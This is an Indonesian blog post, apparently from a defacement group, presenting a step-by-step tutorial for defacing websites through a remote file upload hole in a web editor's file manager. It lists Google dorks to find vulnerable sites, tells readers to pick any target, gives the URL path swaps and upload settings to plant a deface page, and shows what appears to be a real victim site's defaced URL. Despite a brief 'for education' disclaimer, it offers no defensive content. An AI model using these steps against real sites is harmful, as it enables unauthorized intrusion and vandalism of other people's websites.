Perlu diketahui tutorial ini bukan untuk digunakan sembarangan, tapi digunakan untuk pendidikan semata jadi bila anda tidak ingin websitenya kena Deface anda bisa mengetahui titik kelemahan daripada Def. Mending simak dulu cara ngedefacenya.
We are AnonymousOk, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut TutorialDeface dengan Teknik Remote File Upload Vulnerability :
Dork :inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"
1). Masukan salah satu dork diatas ke Scrh Enginee Google.
2). Pilih salah satu website sebagai target.
3). Tampilan Webitenya nanti akan seperti ini.
4). Kemudian kode ini :
editor/editor/filemanager/browser/mcpuk/s/icons/32/
5). Ganti dengan kode ini, Lalu enter :
editor/editor/filemanager/upload/test.html
6). Jika sudah, kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi P.
7). Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.
8). Lalu klik Send it to the Server.
9). Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan dimana file kamu berada.
10). Copykan saja file yang ada di( Upload File URL )lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini : http://www.tysk.ee//failid//makarovz.html
Dan hasilnya : http://www.tysk.ee//failid//makarovz.html
Source Tuts
No comments:
Post a Comment